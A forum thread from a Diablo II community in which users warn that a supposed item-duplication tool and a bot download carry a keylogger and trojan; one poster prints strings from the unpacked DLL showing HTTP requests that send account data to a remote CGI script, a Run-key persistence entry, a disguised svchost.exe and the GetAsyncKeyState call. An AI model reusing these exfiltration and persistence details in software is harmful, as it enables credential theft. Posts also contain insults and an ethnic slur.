ALERT! MM Bot and DupeApp

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
I went to this site: www.d2.nullspot.net and tried to download the duper and the bot... im not sure about the dupe program, but im thinking its a keylogger, but the mmbot contains a trojan horse which I think that the website put into it. If you know how to remove the virus and the keylogger thing on the dupe program, please tell me.

I need a more official link for these programs please... because as of now, i dont dare type in anything relating to my account or password... Please help!
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
FAKE WEBSITE! ITS A COPY OF THE OFFICIAL WEBSITE! DO NOT GO THERE! IF YOU WENT THERE, DOWNLOAD YAHOO ANTISPY BECAUSE IT GIVES YOU A VIRUS JUST VISITING THE WEBSITE!
 

Darkness8

Member!
Joined
Dec 9, 2005
Messages
36
Reaction score
0
how about this no cheats does any one do leggit things any more?
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
The official website is www.d2gamehacks.com and Im sure that this site has no viruses or anything according to (AIM ADRESS) Cyb3rth

But im not sure, so can someone actually approve of this site? Such as an admin?
 

GeKo

Member
Joined
Jul 27, 2003
Messages
6
Reaction score
0
Website
Visit site
I have no idea if that site has trojans or keyloggers, im afraid to download the dupe program:p Somone help verify if the site is legit or not. Thank you
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
Yes, I recieved it from the official provider of the site, so im not too sure as many people lie in this world :/
 

PauseBreak

BattleForums Senior Member
Joined
Aug 27, 2003
Messages
4,616
Reaction score
12
Draygonia said:
FAKE WEBSITE! ITS A COPY OF THE OFFICIAL WEBSITE! DO NOT GO THERE! IF YOU WENT THERE, DOWNLOAD YAHOO ANTISPY BECAUSE IT GIVES YOU A VIRUS JUST VISITING THE WEBSITE!
Wow awesome. How about removing the site that you provided so that people don't click on it.
 

Andrewp30

Member!
Joined
Jul 25, 2005
Messages
157
Reaction score
0
wow... just wow.... go to mmbot's official site moron!!!!! it is free you know... i have had mmbot for a few weeks and nothing wrong with them. norton, mcafee, and avg all say that it is clean. but then agian, i don't go to unofficial sites for mmbot. i go to the real site.

try mm's official site befor you go to make him look bad.
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
Its not the mmbot im worried about.. I got that working, its the dupe app that im worried about... I dont know the official website for that prog. Plus, my mm bot could be a tad smarter... not like d2jsp where the bot doesnt tele into pindle and his minions and sucks up the rejuv potions like soda.
 

griffithx86

New Member
Joined
Dec 12, 2005
Messages
1
Reaction score
0
SIgh

Ok, noobs. The site www.d2gamehacks.com has nothing *but* keylogging apps on it.

If any of you had any amount of common sense, you would *hex edit* these programs before running them. Or even more common sense, any "program" you see with the word dupe in it, not even download AT ALL.

But if you don't, then you would see the file anti-detect.dll [as found in one file from that site, i believe the dupe app] is packed with UPX. After unpacking, a simple hex edit discovers the following:

GET /hello.cgi?account=new3&logs=heyey HTTP/1.0.HOST: d2gamehacks.com...64.202.163.7.... HTTP/1.0.HOST: d2gamehacks.com.....&logs=RUNNING!.. <-- cgi script to retrieve data, i.e. account/password/cd keys etc.

GET /cgi/hello.cgi?account=.svchost.C:\Windows\svchost.exe..Software\Microsoft\Windows\CurrentVersion\Run...CVTmod.exe..c:\Windows\svchost.exe. <-- name of trojan CVTmod.exe, also svchost.exe as a desguise to look like a legit file but the real svchost lies in system32, not $windir.

.DIABLO ACTIVE!..Diablo II...Preferred Realm.Last BNet...Software\Blizzard Entertainment\Diablo II...JUSTTOCHECK.%2f.%22.%25.%27.%3a.%7d.%7b.%5d.%5b.%29.%28.%23.%21.%24.%26.%5c.%7c.%2a.%3e.%3c.%3b.&logs=..&realm=.. @....... <-- self explanatory..

Various API calls include:


GetCurrentProcess...UnhandledExceptionFilter..GetModuleFileNameA..FreeEnvironmentStringsA...FreeEnvironmentStringsW...WideCharToMultiByte...GetEnvironmentStrings...GetEnvironmentStringsW..SetHandleCount..RegOpenKeyExA...RegSetValueExA..RegCloseKey...RegQueryValueExA..GetPixel..GetForegroundWindow

These are various registry functions among other things. They can extract your last account entered, realm, install path and plenty of other things you don't want people knowing. Also,

GetAsyncKeyState..

Ok people. This function has only one use. Keylogging. Nothing else. If you see this and still wilingly open this program, you are a total noob moron.

Getpixel and other api calls are used which could grab the connect to determine when the mouse overs the battle.net command button, and thus would activate the keylogger to effectively steal your noob asses account and password.

Not to mention the whole 'heart beat packet' explanation for the dupe method on the page makes no sense whatsoever, there are a gillion warning signs here. Don't be a noob. There are *no* public dupe "programs"
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
Thanks for explaining that so brutally, I wont dl it and I was right... dupe progs do cost 300 bux... that guy was lying just to get my acct... arg...
 

Jimbo

Member!
Joined
Jul 11, 2003
Messages
4,493
Reaction score
11
Website
Visit site
Dupe APPLICATIONS = scam...

most dupes now do not require an application(program) to work, dupes are just exploiting bugs to duplicate an item..... its its an application... most likeley its a scam people..
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
Than contanct cyb3rth and tell him hes a damn scammer for telling me it was official... In fact... i may do that myself...
 

Dragnskull

Retired Staff
Joined
May 30, 2003
Messages
6,812
Reaction score
12
Location
Humble, Texas
omfg...where is the mod when you need him...its been 5 days, links to trojan sites, a noob asking about a dupe, a noob asking wheres a link to the REAL site for mmbot (check stickies, duh.) ...jesus crist...

1. DONT click any links these idiots have posted. to the idiots: please remove your links

2. there are no public dupes. the dupes are fake, trojans, keyloggers, virus's, it doesnt take a genious to figure that out.

3. if youve downloaded the programs (cause ur a ****ing moron) go to www.housecall.antivirus.com and hit scan now, select your country and click go or whatever, then when it asks to install something say yes, check my computer, and scan.

4. stop being such ****ing noob gooks.
 

Draygonia

BattleForums Junior Member
Joined
May 17, 2005
Messages
101
Reaction score
0
Well the guy said not to listen to anyone about what they said because he claimed to be a computer science software engineer... he did help me remove the virus I did have so I trusted him... didnt know he was a psyco
 
Joined
Dec 29, 2005
Messages
237
Reaction score
0
Location
Melvindale
Draygonia said:
FAKE WEBSITE! ITS A COPY OF THE OFFICIAL WEBSITE! DO NOT GO THERE! IF YOU WENT THERE, DOWNLOAD YAHOO ANTISPY BECAUSE IT GIVES YOU A VIRUS JUST VISITING THE WEBSITE!



U sure b/c i just went there and im doin fine ^^
 

NewPosts

New threads

Top